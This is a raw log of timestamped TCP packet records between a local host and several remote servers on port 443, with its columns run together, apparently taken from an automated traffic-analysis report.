                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.557426929 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.557476044 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.557544947 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.557805061 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.557817936 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.937458992 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.937553883 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.938292027 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.938317060 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940005064 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940020084 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940073967 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940088034 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940097094 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940110922 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940171003 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940191984 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940202951 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940218925 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940275908 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940289974 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940289974 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940347910 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940439939 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940458059 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940469980 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940478086 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940486908 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940524101 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:45.940529108 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.962708950 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.962791920 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.967375994 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.967382908 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.971762896 CET49768443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:46.971769094 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.693943024 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.694031000 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.694042921 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.694325924 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.922631025 CET49762443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:47.922657013 CET4434976294.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:48.008419037 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:48.008501053 CET4434976894.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.734234095 CET44349796142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.734299898 CET49796443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.735129118 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.735156059 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.735505104 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.736032963 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:54.736046076 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.048410892 CET44349809172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.048530102 CET44349809172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.048635960 CET49809443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.048819065 CET49809443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.053487062 CET44349810162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.053592920 CET44349810162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.053644896 CET49810443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.053644896 CET49810443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.112351894 CET44349811172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.112461090 CET49811443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.160459995 CET4434979594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.160550117 CET4434979594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.160578966 CET49795443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.160597086 CET49795443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.163662910 CET49795443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.163685083 CET4434979594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.194575071 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.194677114 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.195216894 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.195233107 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197057962 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197077036 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197134972 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197144032 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197164059 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197169065 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197191954 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197196960 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197252989 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197263956 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197338104 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197349072 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197415113 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197427988 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197443008 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197453022 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197462082 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197468042 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197534084 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197547913 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197571993 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197587967 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197618008 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197628021 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197727919 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197736979 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197777987 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197788000 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197805882 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197813034 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197829962 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197835922 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197850943 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.197859049 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.799149990 CET44349814172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.799246073 CET49814443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.822747946 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.822802067 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.822891951 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.823168039 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.823180914 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.844609022 CET44349819162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.844685078 CET49819443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.848339081 CET44349820172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.848408937 CET49820443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857479095 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857919931 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.857937098 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.858987093 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.859070063 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860424042 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860513926 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860718012 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.860724926 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:55.862027884 CET44349822172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.539598942 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.542900085 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.543205976 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.543231964 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.544473886 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.544584036 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.545646906 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.545722008 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585361958 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585366011 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585380077 CET4434984118.165.220.110192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.585397005 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600531101 CET49821443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600557089 CET44349821172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600588083 CET49835443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.600627899 CET44349835172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.631283998 CET49841443192.168.2.518.165.220.110
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.631397009 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837362051 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837403059 CET44349854162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837665081 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837909937 CET49854443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837920904 CET44349854162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837939024 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.837981939 CET44349855162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838222980 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838222980 CET49855443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:56.838265896 CET44349855162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.100861073 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.100930929 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.101087093 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.105077028 CET49807443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.105094910 CET4434980794.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.189582109 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195034981 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195054054 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.195528030 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196507931 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196584940 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.196789026 CET49851443192.168.2.5162.159.61.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.206865072 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.206918955 CET44349856172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207082033 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207351923 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207386971 CET44349857172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207848072 CET49856443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207870960 CET44349856172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.207909107 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.208344936 CET49857443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.208364964 CET44349857172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.218178034 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.220995903 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.222606897 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.222621918 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.224315882 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226187944 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226187944 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226212978 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226229906 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226407051 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226421118 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226465940 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226475954 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226500988 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226512909 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226552963 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226552963 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226571083 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226579905 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226885080 CET49845443192.168.2.594.130.188.57
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.226902008 CET4434984594.130.188.57192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.228557110 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.229198933 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.229208946 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.239340067 CET44349851162.159.61.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.239896059 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.241070986 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.241076946 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249512911 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249567032 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.249572039 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.260164022 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.666301012 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.666352987 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.666357994 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.674055099 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.674127102 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.674139977 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.681894064 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.682153940 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.682167053 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.689363003 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.689426899 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.689439058 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.694883108 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.694961071 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.695013046 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.695260048 CET49852443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.695290089 CET44349852172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.719660044 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.719727993 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.719743013 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.720453978 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.720501900 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.720506907 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.723543882 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.723666906 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.723671913 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.726434946 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.726516008 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.726521015 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.730242968 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.730390072 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.730396986 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.734894037 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.734945059 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.734955072 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.743269920 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.743321896 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.743330002 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.755243063 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.755290985 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.755299091 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.757236958 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.757580042 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.757586956 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.764210939 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.764303923 CET49823443192.168.2.5142.250.181.65
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.764313936 CET44349823142.250.181.65192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.768048048 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.768112898 CET44349853172.64.41.3192.168.2.5
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.768165112 CET49853443192.168.2.5172.64.41.3
                                                                                                                                                                                                                                                                                    Dec 23, 2024 06:57:57.768357038 CET49853443192.168.2.5172.64.41.3
